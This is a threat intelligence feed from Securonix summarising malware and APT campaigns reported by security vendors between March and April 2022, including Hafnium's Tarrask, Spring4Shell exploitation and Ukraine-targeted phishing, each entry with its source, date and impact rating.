- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Microsoft
- Intel Name:
- Tarrask – HAFNIUM APT defense evasion malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center has tracked the Chinese-backed Hafnium hacking group and identified that the group has been linked to a piece of a new malware that’s used to maintain persistence on compromised Windows environments. MSTIC has dubbed the defense evasion malware ‘Tarrask ‘ characterized it as a tool that creates ‘hidden’ scheduled tasks on the system.
—
- Intel Source:
- Palo Alto
- Intel Name:
- New version of SolarMarker Malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- A new version of SolarMarker a malware family known for its infostealing and backdoor capabilities has been identified by Palo Alto Networks and is believed to be active as of April 2022. This malware has been prevalent since September 2020 targeting U.S. organizations and part of the infrastructure is still active as of 2022 in addition to a new infrastructure that attackers have recently deployed.
Source:
https://unit42.paloaltonetworks.com/solarmarker-malware/
—
- Intel Source:
- Cofense
- Intel Name:
- Fake COVID-19 forms targeting companies
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Cofense Phishing Defense Center has analysed a phishing campaign where threat actors impersonate companies to send out fake COVID-19 forms. CPDC team saw a phishing email masquerading as a general office wide email claiming someone in the building has been infected with COVID-19 and asking to review the company policy.
Source:
https://cofense.com/blog/covid-19-phish-targeting-companies
—
- Intel Source:
- Cluster25
- Intel Name:
- DPRK-Nexus threat actor spear-phishing campaign
- Date of Scan:
- 2022-04-11
- Impact:
- LOW
- Summary:
- Researchers at Cluster25 has identified a recent activity that started in early days of April 2022 from a DPRK-nexus threat actor using spear-phishing emails containing korean-based malicious documents with different lures to compromise its victims.
Source:
https://cluster25.io/2022/04/11/dprk-nexus-adversary-new-kitty-phishing/
—
- Intel Source:
- Intel Name:
- Multiple cyber espionage operations disrupted
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Meta has shared their Adversarial Threat report in which they provide a broader view into the cyber threats Facebook observes in Iran Azerbaijan Ukraine Russia South America and the Philippines.
Source:
https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- FFDroider Stealer Targeting Social Media Platforms
- Date of Scan:
- 2022-04-11
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have discovered many new types of stealer malwares across different attack campaigns including a novel windows based malware creating a registry key dubbed FFDroider which is designed to send stolen credentials and cookies to C&C server.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Mirai Botnet exploiting Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Trend Micro Research team has confirmed on some earlier reports that the new Spring4Shell vulnerability has been exploited by the Mirai Botnet. The Mirai sample is downloaded to the ‘/tmp’ folder and executed after permission change to make them executable using ‘chmod’.
—
- Intel Source:
- Cado security
- Intel Name:
- Denonia Malware specifically targeting AWS Lambda
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Cado Security published their findings on a new malware called ‘Denonia’ variant that targets AWS Lambda. After further investigation the researchers found the sample was a 64-bit ELF executable. The malware also relies on third-party GitHub libraries including those for writing Lambda functions and retrieving data from Lambda invoke requests.
Source:
https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting European Union institutions
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese APT targets Indian Powegrid
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future finds continued targeting of the Indian power grid by Chinese state-sponsored activity group – likely intended to enable information gathering surrounding critical infrastructure systems.
Source:
https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting Ukraine government
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
—
- Intel Source:
- Avast
- Intel Name:
- Parrot TDS takes over compromised websites
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Avast researchers has published a report stating that a new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. The TDS has infected various web servers hosting more than 16 500 websites ranging from adult content sites personal websites university sites and local government sites.
Source:
https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/
—
- Intel Source:
- Cybereason
- Intel Name:
- Operation Bearded Barbie
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyberreason discovered a new APT-C-23 campaign targeting a group of high-profile Israeli targets working for sensitive defense law enforcement and emergency services organizations. The investigation revealed that APT-C-23 has effectively upgraded its malware arsenal with new tools dubbed Barb(ie) Downloader and BarbWire Backdoor.
—
- Intel Source:
- Fortinet
- Intel Name:
- Remcos RAT phishing campaign
- Date of Scan:
- 2022-04-08
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs share their analysis of the Remcos RAT being used by malicious actors to control victims’ devices delivered by a phishing campaign.
Source:
https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing
—
- Intel Source:
- Trend Micro
- Intel Name:
- BLISTER & SocGholish loaders delivering LockBit Ransomware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro made a recent discovery in which BLISTER and SocGholish which are loaders and are known for evasion tactics were involved in a campaign which were used to deliver LockBit ransomware.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Colibri Loader campaign delivering the Vidar Stealer
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- Researchers from MalwareBytes recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload that uses a clever persistence technique that combines Task Scheduler and PowerShell.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious Word Documents Using MS Media Player
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- ASEC Researchers has analysed a malicious word file that is also being distributed with text that impersonates AhnLab. The Word files downloaded another Word file containing malicious VBA macro via the external URL and run it. The downloaded word file used the Windows Media Player() function instead of AutoOpen() to automatically run the VBA macro.
—
- Intel Source:
- Symantec
- Intel Name:
- Cicada/APT10 new espionage campaign
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at Symantec has discovered an espionage campaign by Chinese APT group called APT10/Cicada. Victims identified in this campaign include government legal religious and non-governmental organizations (NGOs) in multiple countries around the world including in Europe Asia and North America.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New AsyncRAT campaign features 3LOSH crypter
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Cisco Talos Intelligence Group discovered ongoing malware distribution campaigns are using ISO disk images to deliver AsyncRAT and other commodity malware to victims. They found that these campaigns appear to be linked to a new version of the 3LOSH crypter.
Source:
https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html
—
- Intel Source:
- Mandiant
- Intel Name:
- Evolution of FIN7 group
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Mandiant published their research on the evolution of FIN7 from both historical and recent intrusions and describes the process of merging eight previously suspected UNC groups into FIN7. The researchers also highlighted notable shifts in FIN7 activity over time including their use of novel malware incorporation of new initial access vectors and shifts in monetization strategies.
Source:
https://www.mandiant.com/resources/evolution-of-fin7
—
- Intel Source:
- Morphisec
- Intel Name:
- CaddyWiper Malware- New Analysis
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Morphisec shares a new analysis on Caddywiper malware which has surfaced as the fourth destructive wiper attacking Ukrainian infrastructure. Caddywiper destroys user data partitions information from attached drives and has been spotted on several dozen systems in a limited number of organizations.
Source:
https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Windows MetaStealer Malware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS has analysed 16 sampled of Excel files submitted to VirusTotal on 30-03-2022 these Excel files are distributed as Email attachments. Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity.
—
- Intel Source:
- McAfee
- Intel Name:
- Scammers are Exploiting Ukraine Donations
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- McAfee Researchers has identified some malicious sites and emails used by attackers to lure netizens on cryptocurrency donation scam.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-are-exploiting-ukraine-donations/
—
- Intel Source:
- Cofense
- Intel Name:
- New Rat campaign leverages Tax Season
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center team has discovered a tatic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages Netsupport Manager a troubleshooting and screen control program as a malicious remote access trojan (RAT) the threat actor employs to remotely enter user systems.
Source:
https://cofense.com/blog/rat-campaign-looks-to-take-advantage-of-the-tax-season
—
- Intel Source:
- SecureList
- Intel Name:
- Lazarus Group New Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- Researchers at SecureList has discovered a Trojanized DeFi application was used to deliver backdoor by Lazarus Group. The DeFi application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet but also implants a malicious file when executed.
Source:
https://securelist.com/lazarus-trojanized-defi-app/106195/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New UAC-0056 Group activity
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer Labs shared that UAC-0056 (TA471 SaintBear UNC2589) have been launching targeted spear phishing campaigns using spoofed Ukrainian governmental email addresses to deliver the Elephant malware framework written in Go.
—
- Intel Source:
- Fortinet
- Intel Name:
- Mirai campaign updated its arsenal of exploits
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet Labs has identified that the Beastmode Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month with three targeting various models of TOTOLINK routers.
Source:
https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign
—
- Intel Source:
- DFIR Report
- Intel Name:
- Stolen Image Evidence Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at DFIR Report has identified a single Conti ransomware deployment from December that appears to be part of a larger campaign. The attack utilized IcedID a well known banking trojan was delivered via the ‘Stolen Images Evidence’ email campaign.
Source:
https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
—
- Intel Source:
- Qianxin
- Intel Name:
- VajraEleph (APT-Q-43) group New campaign
- Date of Scan:
- 2022-04-05
- Impact:
- LOW
- Summary:
- The mobile security team of Qianxin Technology HK Co. Limited Virus Response Center identified the VajraEleph (APT-Q-43) group has been carrying out targeted military espionage intelligence activities against the Pakistani military.
—
- Intel Source:
- Morphisec
- Intel Name:
- Remcos Rat Phishing Campaign
- Date of Scan:
- 2022-04-05
- Impact:
- MEDIUM
- Summary:
- Morphisec Labs has detected a new wave of Remcos RAT infections being spread through phishing emails masquerading as payment remittances sent from financial institutions.
Source:
https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain
—
- Intel Source:
- ASEC
- Intel Name:
- North Korea related files distributed via malicious VB Scripts
- Date of Scan:
- 2022-04-04
- Impact:
- LOW
- Summary:
- ASEC Researchers has analysed a phishing emails related to North Korea and a compressed file is attached. Referring to writing a resume induce execution of the attached file. A malicious VBS script file exists inside the compressed file.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Hive Ransomware leveraging IPfuscation Technique
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne have discovered a new obfuscation technique used by the Hive ransomware gang which involves IPv4 addresses and a series of conversions that eventually lead to downloading a Cobalt Strike beacon.
Source:
https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/
—
- Intel Source:
- Checkpoint
- Intel Name:
- State sponsored groups leveraging RU-UA conflict
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers from CheckPoint provides an overview of several campaigns by different APT groups using the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. They also discuss the victimology of these campaigns; the tactics used and provides technical analysis of the observed malicious payloads and malware specially crafted for this cyber-espionage.
—
- Intel Source:
- Zscaler
- Intel Name:
- BlackGuard – new infostealer malware
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- The Zscaler ThreatLabz team came across BlackGuard a sophisticated stealer currently being advertised as malware-as-a-service with a monthly price of $200. Researcher share their analysis of the techniques the Blackguard stealer uses to steal information and evade detection using obfuscation as well as techniques used for anti-debugging.
—
- Intel Source:
- Trellix
- Intel Name:
- New PlugX variant used by Chinese APT group
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at Trellix has discovered a new variant of PlugX malware named ‘Talisman’. The new variant follows usual execution process by abusing a signed and benign binary which loads a modified DLL to execute shellcode. The shellcode is used to decrypt the PlugX malware which then serves as a backdoor with plug-in capabilities.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html
—
- Intel Source:
- Morphisec
- Intel Name:
- Mars InfoStealer new operation
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Morphisec Labs team has analysed a campaign where the actor distributed Mars Stealer via cloned websites offering well-known software. Morphisec team has attributed this actor to a Russian national by looking at the screenshots and keyboard details from the extracted system.txt.
Source:
https://blog.morphisec.com/threat-research-mars-stealer
—
- Intel Source:
- SentinelOne
- Intel Name:
- Acid Rain wiper malware targets Viasat KA-SAT modems
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Sentinel Labs researchers a new modern wiper AcidRain which have beeb targeting Europe and on Viasat KA-SAT modems. This wiper is an ELF MIPS malware designed to wipe modems and routers.
Source:
https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/
—
- Intel Source:
- Securonix
- Intel Name:
- Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-01
- Impact:
- HIGH
- Summary:
- Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core a widely used Java-based platform with cross platform support. Early details claim that the bug would allow full remote code execution (RCE) to affected systems.
Source:
https://www.securonix.com/blog/detection-and-analysis-of-spring4shell/
—
- Intel Source:
- Fortinet
- Intel Name:
- Spoofed Invoice delivering IcedID Trojan
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs encountered spearphishing campaign targeting a fuel company in Kyiv Ukraine. The email contains an attached zip file which also contains a invoice file claiming to be from another fuel company. IcedID trojan drop via main.dll in windows registry.
Source:
https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id
—
- Intel Source:
- Fortinet
- Intel Name:
- Deep Panda APT group exploiting Log4shell
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs detected an opportunistic campaign by the Chinese nation-state “Deep Panda” APT group exploiting the Log4Shell vulnerability in VMware Horizon servers belonging to the financial academic cosmetics and travel industries.
Source:
https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits
—
- Intel Source:
- Symantec
- Intel Name:
- Verblecon – A New Malware Loader
- Date of Scan:
- 2022-03-31
- Impact:
- LOW
- Summary:
- Symantec researchers has identifed a malware named Trojan.Verblecon which has being leveraged in attacks that appear to have installing cryptocurrency miners on infected machines as their end goals. However the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware or espionage campaigns.
—
- Intel Source:
- Intel Name:
- Multiple APT groups targeting Eastern Europe
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google TAG researchers has tracked 3 APT groups targeting government military organisations in Ukraine Kazakhstan Mongolia and NATO forces in Eastern Europe. All 3 APT groups conducting phishing campaigns to against the targets.
Source:
https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe targets Indian government and military
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers has identified a new campaign by Transparent Tribe targeting Indian government and military bodies. The Threat actor is leveraging CrimsonRAT for infecting the victims.
Source:
https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html
—
- Intel Source:
- Intel Name:
- Chromium Based Browser Vulnerability
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google is urging users on Windows macOS and Linux to update Chrome builds to version 99.0.4844.84 following the discovery of a vulnerability that has an exploit in the wild.
Source:
https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT malware disguised as office Installer
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC REsearchers has analysed a BitRAT malware sample which is being distributed as office installer with different files. The malware is being distributed actively via file-sharing websites such as Korean webhards.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky distributing VB Script disguised as PDF Files
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC Researchers has identified an APT attacks by a group called Kimsuky using VB Script disguised as PDF files. Upon running the script file with the VBS extension the malware runs the innocuous PDF file that exists internally to trick the user into thinking that they opened an innocuous document file and uses a malicious DLL file to leak information.
—
- Intel Source:
- Cisco
- Intel Name:
- Emotet New IoC and New Pattern
- Date of Scan:
- 2022-03-30
- Impact:
- MEDIUM
- Summary:
- Cisco conducted research to find new Emotet IOCs and URL patterns related to this new wave in Emotet activity since it’s re-emergence in November 2021. Cisco researchers summarizes the Emotet (Geodo/Heodo) malware threat it’s lifecycle and typical detectable patterns.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Purple Fox using New variant of FatalRat
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Trend Micro Research were tracking an threat actor named ‘Purple Fox’ and their activities. Researchers identified Purple Fox’s new arrival vector and the early access loaders we believe are associated with the intrusion set behind this botnet. The operators are updating their arsenal with new malware including a variant of the remote access trojan FatalRAT that they seem to be continuously upgrading.
—
- Intel Source:
- Intezer
- Intel Name:
- New Conversation Hijacking Campaign Delivering IcedID
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Researcher from Intezer provides a technical analysis of a new campaign which initiates attacks with a phishing email that uses conversation hijacking to deliver the IcedID malware.
Source:
https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/
—
- Intel Source:
- Juniper
- Intel Name:
- Muhstik Gang targets Redis Servers
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Juniper Threat Labs has revealed an attack that targets Redis Servers using a recently disclosed vulnerability namely CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The payload used is a variant of Muhstik bot that can be used to launch DDOS attacks.
Source:
https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers
—
- Intel Source:
- Zscaler
- Intel Name:
- Conti Ransomware new update
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler ThreatLabz has been following Conti Ransomware group and identified an updated version of Conti ransomware as part of the global ransomware tracking efforts which includes improved file encryption introduced techniques to better evade security software and streamlined the ransom payment process.
—
- Intel Source:
- Avast
- Intel Name:
- Operation Dragon Castling
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Researchers from Avast found an APT campaign dubbed Operation Dragon Castling which has been targeting betting companies in Southeast Asian countries.The campaign has similarities with several old malware samples used by an unspecified Chinese-speaking APT group.
—
- Intel Source:
- Morphisec
- Intel Name:
- JSSLoader RAT delivered through XLL Files
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Morphisec labs has discovered a new variant of JSSLoader RAT. JSSLoader is a small very capable .NET remote access trojan (RAT). Its capabilities include data exfiltration persistence auto-updating additional payload delivery and more. Moreover attacker are now using .XLL files to deliver and obfuscated version of JSSLoader.
Source:
https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files
—
- Intel Source:
- SentinelOne
- Intel Name:
- Chinese APT Scarab targets Ukraine
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Sentinel Labs has further analysed the alert #4244 released by Ukrainian CERT on 22nd March 2022 which states about the malicious activity of UAC-0026 threat group. Sentinel team has confirmed UAC-0026 attribution with Chinese APT group called Scarab.
Source:
https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/
—
- Intel Source:
- Fortinet
- Intel Name:
- Tax Season and Refugee war scams delivering Emotet
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs Research team has anlaysed emails related to tax season and the Ukrainian conflict. The Phishing emails are attributed to an unfamous malware called ‘Emotet’ are affecting Windows platform and compromised machines are under the control of the threat actor further stole personally identifiable information (PII) credential theft monetary loss etc.
Source:
https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams
—
- Intel Source:
- eSentire
- Intel Name:
- Conti Ransomware Affiliate Exposed
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers at eSentire has been tracking the movements of Conti gang for over two years and now publishing new set of indicators which are currently being used by Conti affiliate. Researchers analysis also focus on the infrastructre used by the gang.
—
- Intel Source:
- deepinstinct
- Intel Name:
- Arid Viper using Arid Gopher malware
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Deep Instinct’s Threat Research team discovered a never before seen Micropsia malware dubbed Arid Gropher and is attributed to Arid Viper.
Source:
https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant
—
- Intel Source:
- Avast
- Intel Name:
- Meris and TrickBot joined Hands
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- As per Avast researchers Meris backdoor and Trickbot have joined hands. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847) enabling the attackers to gain unauthenticated remote administrative access to any affected device.
Source:
https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/
—
- Intel Source:
- Avast
- Intel Name:
- Password stealer disguised as private Fortnite server
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Avast have identified a password stealer malware disguised as private Fortnite server where users can meet for a private match and use skins for free. The malware is being heavily propagated on communications platform Discord.
Source:
https://blog.avast.com/password-stealer-disguised-as-fortnite-server-spreading-on-discord
—
- Intel Source:
- Trustwave
- Intel Name:
- Vidar Malware hidden in Microsoft Help file
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Trustwave Spider Labs researchers has detected a vidar malware based phishing campaign that abuses Microsoft HTML help files. Vidar is Windows spyware and an information stealer available for purchase by cybercriminals. Vidar can harvest OS & user data online service and cryptocurrency account credentials and credit card information.
—
- Intel Source:
- Zscaler
- Intel Name:
- Midas Ransomware – A Thanos Ransomware variant
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Zscaler has analysed variants of Thanos ransomware and identified the shifting of tactics by the ransomware in 2021. Thanos ransomware was first identified in Feb 2020 as a RaaS on darkweb. In 2021 Thanos source code got leaked after that lot of variants has been identified by the researchers. One of the latest variant is Midas.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- New variants of Arkei Stealer
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at SANS InfoSec Diary blog has analysed Vidar Oski and Mars stealer variants of Arkei Stealer malware. Researchers also found legitimate DLL files has been used by Vidar Oski and Mars variants which are hosted on the same C2 server.
—
- Intel Source:
- Confiant
- Intel Name:
- Crypto Phishing
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researcher at Confiant has looked at several chains that start with an ad and end with cryptocurrency theft usually via phishing.
Source:
https://blog.confiant.com/a-whirlwind-tour-of-crypto-phishing-8628da0a9e38
—
- Intel Source:
- Intel Name:
- Operation DreamJob and AppleJeus
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from google discovered two new North Korean backed threat actors exploiting a remote code execution vulnerability in Chrome CVE-2022-0609.hese groups’ activity has been publicly tracked as Operation Dream Job and Operation AppleJeus. These campaigns have been targeting U.S based organizations.
Source:
https://blog.google/threat-analysis-group/countering-threats-north-korea/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0026 targets Ukraine by HeaderTIP malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT UA identified yet another nefarious malware dubbed headerTip which leveraged to drop additional DLL files to the infected instance and this has been targeting the nfrastructure of Ukrainian state bodies and organizations across the country.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing Campaign using QR code targets Ukraine
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT UA discovered the distribution of e-mails that mimic messages from UKR.NET and contain a QR code encoding a URL created using one of the URL-shortener services and it was attributed with low confidence to APT28.
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- Mustang Panda deploying new Hodur Malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- A new cyber espionage campaign has been discovered by researchers from ESET in which APT group Mustang Panda who is China linked was deploying Hodur malware. The victims are from east and southeast Asia.
Source:
https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17 CERT-UA found an active spear phishing campaign delivering SPECTR malware. The campaign was initiated by Vermin aks UAC-0020 who are associated with Luhansk People’s Republic (LPR).
—
- Intel Source:
- ASEC
- Intel Name:
- Document-borne APT attack targeting Carbon emissions companies
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- ASEC Team has analysed a malicious word document titled ‘**** Carbon Credit Institution.doc’ which user downloaded thorugh a web browser. The team identified the malicious document from the logs collected by their Smart Defense tool. The malicious document comes with macro code and it is likely that its internal macro code runs wscript.ex.
—
- Intel Source:
- CERT-UA
- Intel Name:
- DoubleZero Destructive Malware targets Ukrainian firms
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17 CERT-UA found presence of a destructive malware dubbed as DoubleZero targeting Ukrainian firms. The malware erases files and destroys certain registry branches on the infected machine.
—
- Intel Source:
- ASEC
- Intel Name:
- ClipBanker Malware disguised as Malware Creation Tool
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- ASEC Team has indentified a ClipBanker malware which disguised as malware creation tool. ClipBanker malware monitors the clipbooard of the infected system and if the malware copies a string for a coin wallet address then changes its to the address designated by the attacker.
—
- Intel Source:
- Cyble
- Intel Name:
- Clipper malware disguised as AvD Crypto Stealer
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- Researchers at Cyble has discovered a new malware dubbed as ‘AvD crypto stealer’ but it is does not function as crypto stealer. However it disguised variant of well-known clipper malware and it has capability of read and edit any text copied by vicitm.
Source:
https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT distributed via webhards
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- ASEC team has analysed a malware which is being distributed via webhards they identified malware as BitRAT. The attacker disguised the malware as Windows10 license verification tool and to lure the netizens attacker named the installer as ‘New Quick Install Windows License Verification’ One-click.
—
- Intel Source:
- STR
- Intel Name:
- Serpent Backdoor_Seeder_Queries_21/03/22
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0035/InvisiMole targeting Ukrainain government
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- CERT-UA identified cyberattacks being launched by the UAC-0035/InvisiMole threat group targeting Ukrainain government organisations using phishing campaigns. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon group.
—
- Intel Source:
- Arete
- Intel Name:
- SurTr Ransomware recent activity
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Researchers from Arete investigated a security incident involving Surtr ransomware which made registry key change to the infected host to pay tribute to REvil group.
Source:
https://areteir.com/surtr-ransomware-pays-tribute-to-revil/
—
- Intel Source:
- DFIR Report
- Intel Name:
- APT35 Automates Initial Access Using ProxyShell
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- Researchers at DFIR report observed an intrusion attributed to APT35 exploiting ProxyShell vulnerabilities followed by some further post-exploitation activity which included web shells credential dumping and specialized payloads.
Source:
https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
—
- Intel Source:
- Trellix
- Intel Name:
- DarkHotel APT New Campaign
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
